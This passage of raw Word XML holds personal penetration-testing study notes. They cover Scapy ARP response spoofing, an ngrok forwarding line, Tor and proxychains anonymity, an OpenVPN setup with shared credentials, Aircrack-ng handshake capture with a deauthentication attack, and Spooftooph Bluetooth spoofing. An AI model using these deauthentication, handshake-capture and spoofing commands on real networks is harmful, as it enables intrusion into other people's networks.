      </w:r>
    </w:p>
    <w:p w14:paraId="17694760" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- .show() = show us the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3ECD1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>2. Send off the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00D795" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- send(packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B37D0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- send = send the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>packe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to that machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78E161" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- packet = ARP response we crated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B36A1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Forwarding                    tcp://8.tcp.ngrok.io:14211 -&gt; localhost:5555                                                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BAA02" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="205601AB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>VIRTUAL ANONAMITITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AC907" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Tor Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4EC518" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>torbrowser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-launcher: starts tor browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC025B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="362358B1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ProxyChains4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E4CE8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>1. Start Tor service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A90227" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Using service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>tor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4498A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">2. Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B4615E4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (whatever browser/domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC28EBE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>3. REMEMBER BURP SUITE CANNOT RUN AT THE SAME TIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EACA5E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2E624C98" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>OPENVPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2131E6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">1. Go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> book within browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083ED63" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">2. download and unzip the file of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> you want to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036EEF2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">3. ls inside the file you just </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>unziped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267976AF"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openvpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --config vpnbook-uk205-tcp80.ovpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAD6F7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- type username &amp; password from website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA58ED5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- If this doesn't work paste: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-cipher "DEFAULT:@SECLEVEL=0" under redirect gateway in file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666557B2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. Once in file run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E22B18" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>openvpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --config vpnbook-uk68-tcp80.ovpn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C12FA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>vpnbook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39910A2A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>3. e83zu76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FC527" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="057B1F1F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>Learning Aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F659358" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">ALL OF THESE NEED ROOT PERMISSIONS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D281D1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>1. Enable monitoring mode on your wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB0983"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airmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38D795" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>2. Discover available different networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB345AD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-ng wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784A974" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>3. Start Packet Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765BC67" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>airodump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> &lt;(Networks' MAC address // </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)&gt; -c &lt;(Network Channel Number // channel)&gt; -w &lt;(Output File Name)&gt; wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F99F99" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">4. (Optional But Cool) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>deauthenticate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> someone to gain access to the authentication handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C84CE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-ng --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>deauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 10 -a &lt;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)&gt; -c &lt;(Router's MAC address)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F8C9A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Word list for other research (/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/share/wordlists/rockyou.txt.gz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031F1DF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Learning Aircrack-ng Pt. 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7718D080" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Airdecap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-ng: allows you to read and decrypt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> traffic from files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03AC33" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>Different Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1D102" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Aircrack-ng "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>FileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">": identifies BSSID, ESSID, and type of encryption </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC0136" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="78F73308" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Kali-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E6D9F83" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- Tools helps with staying safe while browsing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>privatly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8D2F4C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> kali-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --help to start </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C2DC1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> kali-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> [option]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40543954" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7A281AC9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --start  :   It will make backups and start the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9897F6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --stop   :   Closes the program using a backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0ABDD0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --status :   Provides information about IP address and working status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320C1BB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --fix    :   Used to repair the system in case of a possible bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB515BA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> --help   :   This shows the menu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F3E8A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="63DEEFEC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Active Directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA72EFD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7AC289DB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="142F90C5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FD192EE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">MUST BE IN ROOT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEAB99" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">1. Turn on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> adapters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609DF3B"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hciconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> hci0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C59B53" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>2. Check to see if adapter is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE47E2B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hciconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EC9083E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>3. You can change the name of the device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E1D72"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spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> hci0 -n USB_TEST_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC7FF9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>4. Change the USB class type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5639F8"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spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> hci0 -c 0x1F00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA8FA6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>5. Change the USB Bluetooth MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5165A1C1"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spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> hci0 -a XX:XX:XX:XX:XX:XX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB49C5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3D49F08B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">6/2. (COULD BE USED 2nd) Scan all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
